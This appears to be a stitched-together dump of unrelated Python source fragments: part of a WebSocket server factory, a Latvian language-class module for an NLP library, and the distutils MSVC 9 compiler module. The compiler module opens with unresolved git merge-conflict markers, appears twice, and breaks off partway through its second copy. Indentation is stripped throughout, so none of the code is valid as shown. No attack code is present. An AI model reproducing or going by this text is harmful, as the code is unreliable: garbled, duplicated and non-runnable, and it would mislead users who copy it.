WebSocketServerFactory.__init__(self, url, debug=debug, debugCodePaths=debugCodePaths)
self.mserver = mserver
self.kserver = kserver
self.outstanding = {}
self.clients = []
def register(self, client):
if client not in self.clients:
self.clients.append(client)
def unregister(self, client):
if client in self.clients:
self.clients.remove(client)
def push(self, msg):
for c in self.clients:
c.sendMessage(msg)
|
from .stop_words import STOP_WORDS
from ...language import Language
class LatvianDefaults(Language.Defaults):
stop_words = STOP_WORDS
class Latvian(Language):
lang = "lv"
Defaults = LatvianDefaults
__all__ = ["Latvian"]
|
<<<<<<< HEAD
<<<<<<< HEAD
"""distutils.msvc9compiler
Contains MSVCCompiler, an implementation of the abstract CCompiler class
for the Microsoft Visual Studio 2008.
The module is compatible with VS 2005 and VS 2008. You can find legacy support
for older versions of VS in distutils.msvccompiler.
"""
import os
import subprocess
import sys
import re
from distutils.errors import DistutilsExecError, DistutilsPlatformError, \
CompileError, LibError, LinkError
from distutils.ccompiler import CCompiler, gen_preprocess_options, \
gen_lib_options
from distutils import log
from distutils.util import get_platform
import winreg
RegOpenKeyEx = winreg.OpenKeyEx
RegEnumKey = winreg.EnumKey
RegEnumValue = winreg.EnumValue
RegError = winreg.error
HKEYS = (winreg.HKEY_USERS,
winreg.HKEY_CURRENT_USER,
winreg.HKEY_LOCAL_MACHINE,
winreg.HKEY_CLASSES_ROOT)
NATIVE_WIN64 = (sys.platform == 'win32' and sys.maxsize > 2**32)
if NATIVE_WIN64:
# Visual C++ is a 32-bit application, so we need to look in
# the corresponding registry branch, if we're running a
# 64-bit Python on Win64
VS_BASE = r"Software\Wow6432Node\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Wow6432Node\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Wow6432Node\Microsoft\.NETFramework"
else:
VS_BASE = r"Software\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Microsoft\.NETFramework"
PLAT_TO_VCVARS = {
'win32' : 'x86',
'win-amd64' : 'amd64',
'win-ia64' : 'ia64',
}
class Reg:
"""Helper class to read values from the registry
"""
def get_value(cls, path, key):
for base in HKEYS:
d = cls.read_values(base, path)
if d and key in d:
return d[key]
raise KeyError(key)
get_value = classmethod(get_value)
def read_keys(cls, base, key):
"""Return list of registry keys."""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
L = []
i = 0
while True:
try:
k = RegEnumKey(handle, i)
except RegError:
break
L.append(k)
i += 1
return L
read_keys = classmethod(read_keys)
def read_values(cls, base, key):
"""Return dict of registry keys and values.
All names are converted to lowercase.
"""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
d = {}
i = 0
while True:
try:
name, value, type = RegEnumValue(handle, i)
except RegError:
break
name = name.lower()
d[cls.convert_mbcs(name)] = cls.convert_mbcs(value)
i += 1
return d
read_values = classmethod(read_values)
def convert_mbcs(s):
dec = getattr(s, "decode", None)
if dec is not None:
try:
s = dec("mbcs")
except UnicodeError:
pass
return s
convert_mbcs = staticmethod(convert_mbcs)
class MacroExpander:
def __init__(self, version):
self.macros = {}
self.vsbase = VS_BASE % version
self.load_macros(version)
def set_macro(self, macro, path, key):
self.macros["$(%s)" % macro] = Reg.get_value(path, key)
def load_macros(self, version):
self.set_macro("VCInstallDir", self.vsbase + r"\Setup\VC", "productdir")
self.set_macro("VSInstallDir", self.vsbase + r"\Setup\VS", "productdir")
self.set_macro("FrameworkDir", NET_BASE, "installroot")
try:
if version >= 8.0:
self.set_macro("FrameworkSDKDir", NET_BASE,
"sdkinstallrootv2.0")
else:
raise KeyError("sdkinstallrootv2.0")
except KeyError:
raise DistutilsPlatformError(
"""Python was built with Visual Studio 2008;
extensions must be built with a compiler than can generate compatible binaries.
Visual Studio 2008 was not found on this system. If you have Cygwin installed,
you can try compiling with MingW32, by passing "-c mingw32" to setup.py.""")
if version >= 9.0:
self.set_macro("FrameworkVersion", self.vsbase, "clr version")
self.set_macro("WindowsSdkDir", WINSDK_BASE, "currentinstallfolder")
else:
p = r"Software\Microsoft\NET Framework Setup\Product"
for base in HKEYS:
try:
h = RegOpenKeyEx(base, p)
except RegError:
continue
key = RegEnumKey(h, 0)
d = Reg.get_value(base, r"%s\%s" % (p, key))
self.macros["$(FrameworkVersion)"] = d["version"]
def sub(self, s):
for k, v in self.macros.items():
s = s.replace(k, v)
return s
def get_build_version():
"""Return the version of MSVC that was used to build Python.
For Python 2.3 and up, the version number is included in
sys.version. For earlier versions, assume the compiler is MSVC 6.
"""
prefix = "MSC v."
i = sys.version.find(prefix)
if i == -1:
return 6
i = i + len(prefix)
s, rest = sys.version[i:].split(" ", 1)
majorVersion = int(s[:-2]) - 6
minorVersion = int(s[2:3]) / 10.0
# I don't think paths are affected by minor version in version 6
if majorVersion == 6:
minorVersion = 0
if majorVersion >= 6:
return majorVersion + minorVersion
# else we don't know what version of the compiler this is
return None
def normalize_and_reduce_paths(paths):
"""Return a list of normalized paths with duplicates removed.
The current order of paths is maintained.
"""
# Paths are normalized so things like: /a and /a/ aren't both preserved.
reduced_paths = []
for p in paths:
np = os.path.normpath(p)
# XXX(nnorwitz): O(n**2), if reduced_paths gets long perhaps use a set.
if np not in reduced_paths:
reduced_paths.append(np)
return reduced_paths
def removeDuplicates(variable):
"""Remove duplicate values of an environment variable.
"""
oldList = variable.split(os.pathsep)
newList = []
for i in oldList:
if i not in newList:
newList.append(i)
newVariable = os.pathsep.join(newList)
return newVariable
def find_vcvarsall(version):
"""Find the vcvarsall.bat file
At first it tries to find the productdir of VS 2008 in the registry. If
that fails it falls back to the VS90COMNTOOLS env var.
"""
vsbase = VS_BASE % version
try:
productdir = Reg.get_value(r"%s\Setup\VC" % vsbase,
"productdir")
except KeyError:
log.debug("Unable to find productdir in registry")
productdir = None
if not productdir or not os.path.isdir(productdir):
toolskey = "VS%0.f0COMNTOOLS" % version
toolsdir = os.environ.get(toolskey, None)
if toolsdir and os.path.isdir(toolsdir):
productdir = os.path.join(toolsdir, os.pardir, os.pardir, "VC")
productdir = os.path.abspath(productdir)
if not os.path.isdir(productdir):
log.debug("%s is not a valid directory" % productdir)
return None
else:
log.debug("Env var %s is not set or invalid" % toolskey)
if not productdir:
log.debug("No productdir found")
return None
vcvarsall = os.path.join(productdir, "vcvarsall.bat")
if os.path.isfile(vcvarsall):
return vcvarsall
log.debug("Unable to find vcvarsall.bat")
return None
def query_vcvarsall(version, arch="x86"):
"""Launch vcvarsall.bat and read the settings from its environment
"""
vcvarsall = find_vcvarsall(version)
interesting = set(("include", "lib", "libpath", "path"))
result = {}
if vcvarsall is None:
raise DistutilsPlatformError("Unable to find vcvarsall.bat")
log.debug("Calling 'vcvarsall.bat %s' (version=%s)", arch, version)
popen = subprocess.Popen('"%s" %s & set' % (vcvarsall, arch),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
stdout, stderr = popen.communicate()
if popen.wait() != 0:
raise DistutilsPlatformError(stderr.decode("mbcs"))
stdout = stdout.decode("mbcs")
for line in stdout.split("\n"):
line = Reg.convert_mbcs(line)
if '=' not in line:
continue
line = line.strip()
key, value = line.split('=', 1)
key = key.lower()
if key in interesting:
if value.endswith(os.pathsep):
value = value[:-1]
result[key] = removeDuplicates(value)
finally:
popen.stdout.close()
popen.stderr.close()
if len(result) != len(interesting):
raise ValueError(str(list(result.keys())))
return result
VERSION = get_build_version()
if VERSION < 8.0:
raise DistutilsPlatformError("VC %0.1f is not supported by this module" % VERSION)
class MSVCCompiler(CCompiler) :
"""Concrete class that implements an interface to Microsoft Visual C++,
as defined by the CCompiler abstract class."""
compiler_type = 'msvc'
# Just set this so CCompiler's constructor doesn't barf. We currently
# don't use the 'set_executables()' bureaucracy provided by CCompiler,
# as it really isn't necessary for this sort of single-compiler class.
# Would be nice to have a consistent interface with UnixCCompiler,
# though, so it's worth thinking about.
executables = {}
# Private class data (need to distinguish C from C++ source for compiler)
_c_extensions = ['.c']
_cpp_extensions = ['.cc', '.cpp', '.cxx']
_rc_extensions = ['.rc']
_mc_extensions = ['.mc']
# Needed for the filename generation methods provided by the
# base class, CCompiler.
src_extensions = (_c_extensions + _cpp_extensions +
_rc_extensions + _mc_extensions)
res_extension = '.res'
obj_extension = '.obj'
static_lib_extension = '.lib'
shared_lib_extension = '.dll'
static_lib_format = shared_lib_format = '%s%s'
exe_extension = '.exe'
def __init__(self, verbose=0, dry_run=0, force=0):
CCompiler.__init__ (self, verbose, dry_run, force)
self.__version = VERSION
self.__root = r"Software\Microsoft\VisualStudio"
# self.__macros = MACROS
self.__paths = []
# target platform (.plat_name is consistent with 'bdist')
self.plat_name = None
self.__arch = None # deprecated name
self.initialized = False
def initialize(self, plat_name=None):
# multi-init means we would need to check platform same each time...
assert not self.initialized, "don't init multiple times"
if plat_name is None:
plat_name = get_platform()
# sanity check for platforms to prevent obscure errors later.
ok_plats = 'win32', 'win-amd64', 'win-ia64'
if plat_name not in ok_plats:
raise DistutilsPlatformError("--plat-name must be one of %s" %
(ok_plats,))
if "DISTUTILS_USE_SDK" in os.environ and "MSSdk" in os.environ and self.find_exe("cl.exe"):
# Assume that the SDK set up everything alright; don't try to be
# smarter
self.cc = "cl.exe"
self.linker = "link.exe"
self.lib = "lib.exe"
self.rc = "rc.exe"
self.mc = "mc.exe"
else:
# On x86, 'vcvars32.bat amd64' creates an env that doesn't work;
# to cross compile, you use 'x86_amd64'.
# On AMD64, 'vcvars32.bat amd64' is a native build env; to cross
# compile use 'x86' (ie, it runs the x86 compiler directly)
# No idea how itanium handles this, if at all.
if plat_name == get_platform() or plat_name == 'win32':
# native build or cross-compile to win32
plat_spec = PLAT_TO_VCVARS[plat_name]
else:
# cross compile from win32 -> some 64bit
plat_spec = PLAT_TO_VCVARS[get_platform()] + '_' + \
PLAT_TO_VCVARS[plat_name]
vc_env = query_vcvarsall(VERSION, plat_spec)
self.__paths = vc_env['path'].split(os.pathsep)
os.environ['lib'] = vc_env['lib']
os.environ['include'] = vc_env['include']
if len(self.__paths) == 0:
raise DistutilsPlatformError("Python was built with %s, "
"and extensions need to be built with the same "
"version of the compiler, but it isn't installed."
% self.__product)
self.cc = self.find_exe("cl.exe")
self.linker = self.find_exe("link.exe")
self.lib = self.find_exe("lib.exe")
self.rc = self.find_exe("rc.exe") # resource compiler
self.mc = self.find_exe("mc.exe") # message compiler
#self.set_path_env_var('lib')
#self.set_path_env_var('include')
# extend the MSVC path with the current path
try:
for p in os.environ['path'].split(';'):
self.__paths.append(p)
except KeyError:
pass
self.__paths = normalize_and_reduce_paths(self.__paths)
os.environ['path'] = ";".join(self.__paths)
self.preprocess_options = None
if self.__arch == "x86":
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3',
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3',
'/Z7', '/D_DEBUG']
else:
# Win64
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3', '/GS-' ,
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3', '/GS-',
'/Z7', '/D_DEBUG']
self.ldflags_shared = ['/DLL', '/nologo', '/INCREMENTAL:NO']
if self.__version >= 7:
self.ldflags_shared_debug = [
'/DLL', '/nologo', '/INCREMENTAL:no', '/DEBUG', '/pdb:None'
]
self.ldflags_static = [ '/nologo']
self.initialized = True
# -- Worker methods ------------------------------------------------
def object_filenames(self,
source_filenames,
strip_dir=0,
output_dir=''):
# Copied from ccompiler.py, extended to return .res as 'object'-file
# for .rc input file
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
(base, ext) = os.path.splitext (src_name)
base = os.path.splitdrive(base)[1] # Chop off the drive
base = base[os.path.isabs(base):] # If abs, chop off leading /
if ext not in self.src_extensions:
# Better to raise an exception instead of silently continuing
# and later complain about sources and targets having
# different lengths
raise CompileError ("Don't know how to compile %s" % src_name)
if strip_dir:
base = os.path.basename (base)
if ext in self._rc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
elif ext in self._mc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
def compile(self, sources,
output_dir=None, macros=None, include_dirs=None, debug=0,
extra_preargs=None, extra_postargs=None, depends=None):
if not self.initialized:
self.initialize()
compile_info = self._setup_compile(output_dir, macros, include_dirs,
sources, depends, extra_postargs)
macros, objects, extra_postargs, pp_opts, build = compile_info
compile_opts = extra_preargs or []
compile_opts.append ('/c')
if debug:
compile_opts.extend(self.compile_options_debug)
else:
compile_opts.extend(self.compile_options)
for obj in objects:
try:
src, ext = build[obj]
except KeyError:
continue
if debug:
# pass the full pathname to MSVC in debug mode,
# this allows the debugger to find the source file
# without asking the user to browse for it
src = os.path.abspath(src)
if ext in self._c_extensions:
input_opt = "/Tc" + src
elif ext in self._cpp_extensions:
input_opt = "/Tp" + src
elif ext in self._rc_extensions:
# compile .RC to .RES file
input_opt = src
output_opt = "/fo" + obj
try:
self.spawn([self.rc] + pp_opts +
[output_opt] + [input_opt])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
elif ext in self._mc_extensions:
# Compile .MC to .RC file to .RES file.
# * '-h dir' specifies the directory for the
# generated include file
# * '-r dir' specifies the target directory of the
# generated RC file and the binary message resource
# it includes
#
# For now (since there are no options to change this),
# we use the source-directory for the include file and
# the build directory for the RC file and message
# resources. This works at least for win32all.
h_dir = os.path.dirname(src)
rc_dir = os.path.dirname(obj)
try:
# first compile .MC to .RC and .H file
self.spawn([self.mc] +
['-h', h_dir, '-r', rc_dir] + [src])
base, _ = os.path.splitext (os.path.basename (src))
rc_file = os.path.join (rc_dir, base + '.rc')
# then compile .RC to .RES file
self.spawn([self.rc] +
["/fo" + obj] + [rc_file])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
else:
# how to handle this file?
raise CompileError("Don't know how to compile %s to %s"
% (src, obj))
output_opt = "/Fo" + obj
try:
self.spawn([self.cc] + compile_opts + pp_opts +
[input_opt, output_opt] +
extra_postargs)
except DistutilsExecError as msg:
raise CompileError(msg)
return objects
def create_static_lib(self,
objects,
output_libname,
output_dir=None,
debug=0,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
output_filename = self.library_filename(output_libname,
output_dir=output_dir)
if self._need_link(objects, output_filename):
lib_args = objects + ['/OUT:' + output_filename]
if debug:
pass # XXX what goes here?
try:
self.spawn([self.lib] + lib_args)
except DistutilsExecError as msg:
raise LibError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def link(self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
fixed_args = self._fix_lib_args(libraries, library_dirs,
runtime_library_dirs)
(libraries, library_dirs, runtime_library_dirs) = fixed_args
if runtime_library_dirs:
self.warn ("I don't know what to do with 'runtime_library_dirs': "
+ str (runtime_library_dirs))
lib_opts = gen_lib_options(self,
library_dirs, runtime_library_dirs,
libraries)
if output_dir is not None:
output_filename = os.path.join(output_dir, output_filename)
if self._need_link(objects, output_filename):
if target_desc == CCompiler.EXECUTABLE:
if debug:
ldflags = self.ldflags_shared_debug[1:]
else:
ldflags = self.ldflags_shared[1:]
else:
if debug:
ldflags = self.ldflags_shared_debug
else:
ldflags = self.ldflags_shared
export_opts = []
for sym in (export_symbols or []):
export_opts.append("/EXPORT:" + sym)
ld_args = (ldflags + lib_opts + export_opts +
objects + ['/OUT:' + output_filename])
# The MSVC linker generates .lib and .exp files, which cannot be
# suppressed by any linker switches. The .lib files may even be
# needed! Make sure they are generated in the temporary build
# directory. Since they have different names for debug and release
# builds, they can go into the same directory.
build_temp = os.path.dirname(objects[0])
if export_symbols is not None:
(dll_name, dll_ext) = os.path.splitext(
os.path.basename(output_filename))
implib_file = os.path.join(
build_temp,
self.library_filename(dll_name))
ld_args.append ('/IMPLIB:' + implib_file)
self.manifest_setup_ldargs(output_filename, build_temp, ld_args)
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
try:
self.spawn([self.linker] + ld_args)
except DistutilsExecError as msg:
raise LinkError(msg)
# embed the manifest
# XXX - this is somewhat fragile - if mt.exe fails, distutils
# will still consider the DLL up-to-date, but it will not have a
# manifest. Maybe we should link to a temp file? OTOH, that
# implies a build environment error that shouldn't go undetected.
mfinfo = self.manifest_get_embed_info(target_desc, ld_args)
if mfinfo is not None:
mffilename, mfid = mfinfo
out_arg = '-outputresource:%s;%s' % (output_filename, mfid)
try:
self.spawn(['mt.exe', '-nologo', '-manifest',
mffilename, out_arg])
except DistutilsExecError as msg:
raise LinkError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def manifest_setup_ldargs(self, output_filename, build_temp, ld_args):
# If we need a manifest at all, an embedded manifest is recommended.
# See MSDN article titled
# "How to: Embed a Manifest Inside a C/C++ Application"
# (currently at http://msdn2.microsoft.com/en-us/library/ms235591(VS.80).aspx)
# Ask the linker to generate the manifest in the temp dir, so
# we can check it, and possibly embed it, later.
temp_manifest = os.path.join(
build_temp,
os.path.basename(output_filename) + ".manifest")
ld_args.append('/MANIFESTFILE:' + temp_manifest)
def manifest_get_embed_info(self, target_desc, ld_args):
# If a manifest should be embedded, return a tuple of
# (manifest_filename, resource_id). Returns None if no manifest
# should be embedded. See http://bugs.python.org/issue7833 for why
# we want to avoid any manifest for extension modules if we can)
for arg in ld_args:
if arg.startswith("/MANIFESTFILE:"):
temp_manifest = arg.split(":", 1)[1]
break
else:
# no /MANIFESTFILE so nothing to do.
return None
if target_desc == CCompiler.EXECUTABLE:
# by default, executables always get the manifest with the
# CRT referenced.
mfid = 1
else:
# Extension modules try and avoid any manifest if possible.
mfid = 2
temp_manifest = self._remove_visual_c_ref(temp_manifest)
if temp_manifest is None:
return None
return temp_manifest, mfid
def _remove_visual_c_ref(self, manifest_file):
try:
# Remove references to the Visual C runtime, so they will
# fall through to the Visual C dependency of Python.exe.
# This way, when installed for a restricted user (e.g.
# runtimes are not in WinSxS folder, but in Python's own
# folder), the runtimes do not need to be in every folder
# with .pyd's.
# Returns either the filename of the modified manifest or
# None if no manifest should be embedded.
manifest_f = open(manifest_file)
try:
manifest_buf = manifest_f.read()
finally:
manifest_f.close()
pattern = re.compile(
r"""<assemblyIdentity.*?name=("|')Microsoft\."""\
r"""VC\d{2}\.CRT("|').*?(/>|</assemblyIdentity>)""",
re.DOTALL)
manifest_buf = re.sub(pattern, "", manifest_buf)
pattern = "<dependentAssembly>\s*</dependentAssembly>"
manifest_buf = re.sub(pattern, "", manifest_buf)
# Now see if any other assemblies are referenced - if not, we
# don't want a manifest embedded.
pattern = re.compile(
r"""<assemblyIdentity.*?name=(?:"|')(.+?)(?:"|')"""
r""".*?(?:/>|</assemblyIdentity>)""", re.DOTALL)
if re.search(pattern, manifest_buf) is None:
return None
manifest_f = open(manifest_file, 'w')
try:
manifest_f.write(manifest_buf)
return manifest_file
finally:
manifest_f.close()
except OSError:
pass
# -- Miscellaneous methods -----------------------------------------
# These are all used by the 'gen_lib_options() function, in
# ccompiler.py.
def library_dir_option(self, dir):
return "/LIBPATH:" + dir
def runtime_library_dir_option(self, dir):
raise DistutilsPlatformError(
"don't know how to set runtime library search path for MSVC++")
def library_option(self, lib):
return self.library_filename(lib)
def find_library_file(self, dirs, lib, debug=0):
# Prefer a debugging library if found (and requested), but deal
# with it if we don't have one.
if debug:
try_names = [lib + "_d", lib]
else:
try_names = [lib]
for dir in dirs:
for name in try_names:
libfile = os.path.join(dir, self.library_filename (name))
if os.path.exists(libfile):
return libfile
else:
# Oops, didn't find it in *any* of 'dirs'
return None
# Helper methods for using the MSVC registry settings
def find_exe(self, exe):
"""Return path to an MSVC executable program.
Tries to find the program in several places: first, one of the
MSVC program search paths from the registry; next, the directories
in the PATH environment variable. If any of those work, return an
absolute path that is known to exist. If none of them work, just
return the original program name, 'exe'.
"""
for p in self.__paths:
fn = os.path.join(os.path.abspath(p), exe)
if os.path.isfile(fn):
return fn
# didn't find it; try existing path
for p in os.environ['Path'].split(';'):
fn = os.path.join(os.path.abspath(p),exe)
if os.path.isfile(fn):
return fn
return exe
=======
"""distutils.msvc9compiler
Contains MSVCCompiler, an implementation of the abstract CCompiler class
for the Microsoft Visual Studio 2008.
The module is compatible with VS 2005 and VS 2008. You can find legacy support
for older versions of VS in distutils.msvccompiler.
"""
import os
import subprocess
import sys
import re
from distutils.errors import DistutilsExecError, DistutilsPlatformError, \
CompileError, LibError, LinkError
from distutils.ccompiler import CCompiler, gen_preprocess_options, \
gen_lib_options
from distutils import log
from distutils.util import get_platform
import winreg
RegOpenKeyEx = winreg.OpenKeyEx
RegEnumKey = winreg.EnumKey
RegEnumValue = winreg.EnumValue
RegError = winreg.error
HKEYS = (winreg.HKEY_USERS,
winreg.HKEY_CURRENT_USER,
winreg.HKEY_LOCAL_MACHINE,
winreg.HKEY_CLASSES_ROOT)
NATIVE_WIN64 = (sys.platform == 'win32' and sys.maxsize > 2**32)
if NATIVE_WIN64:
# Visual C++ is a 32-bit application, so we need to look in
# the corresponding registry branch, if we're running a
# 64-bit Python on Win64
VS_BASE = r"Software\Wow6432Node\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Wow6432Node\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Wow6432Node\Microsoft\.NETFramework"
else:
VS_BASE = r"Software\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Microsoft\.NETFramework"
PLAT_TO_VCVARS = {
'win32' : 'x86',
'win-amd64' : 'amd64',
'win-ia64' : 'ia64',
}
class Reg:
"""Helper class to read values from the registry
"""
def get_value(cls, path, key):
for base in HKEYS:
d = cls.read_values(base, path)
if d and key in d:
return d[key]
raise KeyError(key)
get_value = classmethod(get_value)
def read_keys(cls, base, key):
"""Return list of registry keys."""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
L = []
i = 0
while True:
try:
k = RegEnumKey(handle, i)
except RegError:
break
L.append(k)
i += 1
return L
read_keys = classmethod(read_keys)
def read_values(cls, base, key):
"""Return dict of registry keys and values.
All names are converted to lowercase.
"""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
d = {}
i = 0
while True:
try:
name, value, type = RegEnumValue(handle, i)
except RegError:
break
name = name.lower()
d[cls.convert_mbcs(name)] = cls.convert_mbcs(value)
i += 1
return d
read_values = classmethod(read_values)
def convert_mbcs(s):
dec = getattr(s, "decode", None)
if dec is not None:
try:
s = dec("mbcs")
except UnicodeError:
pass
return s
convert_mbcs = staticmethod(convert_mbcs)
class MacroExpander:
def __init__(self, version):
self.macros = {}
self.vsbase = VS_BASE % version
self.load_macros(version)
def set_macro(self, macro, path, key):
self.macros["$(%s)" % macro] = Reg.get_value(path, key)
def load_macros(self, version):
self.set_macro("VCInstallDir", self.vsbase + r"\Setup\VC", "productdir")
self.set_macro("VSInstallDir", self.vsbase + r"\Setup\VS", "productdir")
self.set_macro("FrameworkDir", NET_BASE, "installroot")
try:
if version >= 8.0:
self.set_macro("FrameworkSDKDir", NET_BASE,
"sdkinstallrootv2.0")
else:
raise KeyError("sdkinstallrootv2.0")
except KeyError:
raise DistutilsPlatformError(
"""Python was built with Visual Studio 2008;
extensions must be built with a compiler than can generate compatible binaries.
Visual Studio 2008 was not found on this system. If you have Cygwin installed,
you can try compiling with MingW32, by passing "-c mingw32" to setup.py.""")
if version >= 9.0:
self.set_macro("FrameworkVersion", self.vsbase, "clr version")
self.set_macro("WindowsSdkDir", WINSDK_BASE, "currentinstallfolder")
else:
p = r"Software\Microsoft\NET Framework Setup\Product"
for base in HKEYS:
try:
h = RegOpenKeyEx(base, p)
except RegError:
continue
key = RegEnumKey(h, 0)
d = Reg.get_value(base, r"%s\%s" % (p, key))
self.macros["$(FrameworkVersion)"] = d["version"]
def sub(self, s):
for k, v in self.macros.items():
s = s.replace(k, v)
return s
def get_build_version():
"""Return the version of MSVC that was used to build Python.
For Python 2.3 and up, the version number is included in
sys.version. For earlier versions, assume the compiler is MSVC 6.
"""
prefix = "MSC v."
i = sys.version.find(prefix)
if i == -1:
return 6
i = i + len(prefix)
s, rest = sys.version[i:].split(" ", 1)
majorVersion = int(s[:-2]) - 6
minorVersion = int(s[2:3]) / 10.0
# I don't think paths are affected by minor version in version 6
if majorVersion == 6:
minorVersion = 0
if majorVersion >= 6:
return majorVersion + minorVersion
# else we don't know what version of the compiler this is
return None
def normalize_and_reduce_paths(paths):
"""Return a list of normalized paths with duplicates removed.
The current order of paths is maintained.
"""
# Paths are normalized so things like: /a and /a/ aren't both preserved.
reduced_paths = []
for p in paths:
np = os.path.normpath(p)
# XXX(nnorwitz): O(n**2), if reduced_paths gets long perhaps use a set.
if np not in reduced_paths:
reduced_paths.append(np)
return reduced_paths
def removeDuplicates(variable):
"""Remove duplicate values of an environment variable.
"""
oldList = variable.split(os.pathsep)
newList = []
for i in oldList:
if i not in newList:
newList.append(i)
newVariable = os.pathsep.join(newList)
return newVariable
def find_vcvarsall(version):
"""Find the vcvarsall.bat file
At first it tries to find the productdir of VS 2008 in the registry. If
that fails it falls back to the VS90COMNTOOLS env var.
"""
vsbase = VS_BASE % version
try:
productdir = Reg.get_value(r"%s\Setup\VC" % vsbase,
"productdir")
except KeyError:
log.debug("Unable to find productdir in registry")
productdir = None
if not productdir or not os.path.isdir(productdir):
toolskey = "VS%0.f0COMNTOOLS" % version
toolsdir = os.environ.get(toolskey, None)
if toolsdir and os.path.isdir(toolsdir):
productdir = os.path.join(toolsdir, os.pardir, os.pardir, "VC")
productdir = os.path.abspath(productdir)
if not os.path.isdir(productdir):
log.debug("%s is not a valid directory" % productdir)
return None
else:
log.debug("Env var %s is not set or invalid" % toolskey)
if not productdir:
log.debug("No productdir found")
return None
vcvarsall = os.path.join(productdir, "vcvarsall.bat")
if os.path.isfile(vcvarsall):
return vcvarsall
log.debug("Unable to find vcvarsall.bat")
return None
def query_vcvarsall(version, arch="x86"):
"""Launch vcvarsall.bat and read the settings from its environment
"""
vcvarsall = find_vcvarsall(version)
interesting = set(("include", "lib", "libpath", "path"))
result = {}
if vcvarsall is None:
raise DistutilsPlatformError("Unable to find vcvarsall.bat")
log.debug("Calling 'vcvarsall.bat %s' (version=%s)", arch, version)
popen = subprocess.Popen('"%s" %s & set' % (vcvarsall, arch),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
stdout, stderr = popen.communicate()
if popen.wait() != 0:
raise DistutilsPlatformError(stderr.decode("mbcs"))
stdout = stdout.decode("mbcs")
for line in stdout.split("\n"):
line = Reg.convert_mbcs(line)
if '=' not in line:
continue
line = line.strip()
key, value = line.split('=', 1)
key = key.lower()
if key in interesting:
if value.endswith(os.pathsep):
value = value[:-1]
result[key] = removeDuplicates(value)
finally:
popen.stdout.close()
popen.stderr.close()
if len(result) != len(interesting):
raise ValueError(str(list(result.keys())))
return result
VERSION = get_build_version()
if VERSION < 8.0:
raise DistutilsPlatformError("VC %0.1f is not supported by this module" % VERSION)
class MSVCCompiler(CCompiler) :
"""Concrete class that implements an interface to Microsoft Visual C++,
as defined by the CCompiler abstract class."""
compiler_type = 'msvc'
# Just set this so CCompiler's constructor doesn't barf. We currently
# don't use the 'set_executables()' bureaucracy provided by CCompiler,
# as it really isn't necessary for this sort of single-compiler class.
# Would be nice to have a consistent interface with UnixCCompiler,
# though, so it's worth thinking about.
executables = {}
# Private class data (need to distinguish C from C++ source for compiler)
_c_extensions = ['.c']
_cpp_extensions = ['.cc', '.cpp', '.cxx']
_rc_extensions = ['.rc']
_mc_extensions = ['.mc']
# Needed for the filename generation methods provided by the
# base class, CCompiler.
src_extensions = (_c_extensions + _cpp_extensions +
_rc_extensions + _mc_extensions)
res_extension = '.res'
obj_extension = '.obj'
static_lib_extension = '.lib'
shared_lib_extension = '.dll'
static_lib_format = shared_lib_format = '%s%s'
exe_extension = '.exe'
def __init__(self, verbose=0, dry_run=0, force=0):
CCompiler.__init__ (self, verbose, dry_run, force)
self.__version = VERSION
self.__root = r"Software\Microsoft\VisualStudio"
# self.__macros = MACROS
self.__paths = []
# target platform (.plat_name is consistent with 'bdist')
self.plat_name = None
self.__arch = None # deprecated name
self.initialized = False
def initialize(self, plat_name=None):
# multi-init means we would need to check platform same each time...
assert not self.initialized, "don't init multiple times"
if plat_name is None:
plat_name = get_platform()
# sanity check for platforms to prevent obscure errors later.
ok_plats = 'win32', 'win-amd64', 'win-ia64'
if plat_name not in ok_plats:
raise DistutilsPlatformError("--plat-name must be one of %s" %
(ok_plats,))
if "DISTUTILS_USE_SDK" in os.environ and "MSSdk" in os.environ and self.find_exe("cl.exe"):
# Assume that the SDK set up everything alright; don't try to be
# smarter
self.cc = "cl.exe"
self.linker = "link.exe"
self.lib = "lib.exe"
self.rc = "rc.exe"
self.mc = "mc.exe"
else:
# On x86, 'vcvars32.bat amd64' creates an env that doesn't work;
# to cross compile, you use 'x86_amd64'.
# On AMD64, 'vcvars32.bat amd64' is a native build env; to cross
# compile use 'x86' (ie, it runs the x86 compiler directly)
# No idea how itanium handles this, if at all.
if plat_name == get_platform() or plat_name == 'win32':
# native build or cross-compile to win32
plat_spec = PLAT_TO_VCVARS[plat_name]
else:
# cross compile from win32 -> some 64bit
plat_spec = PLAT_TO_VCVARS[get_platform()] + '_' + \
PLAT_TO_VCVARS[plat_name]
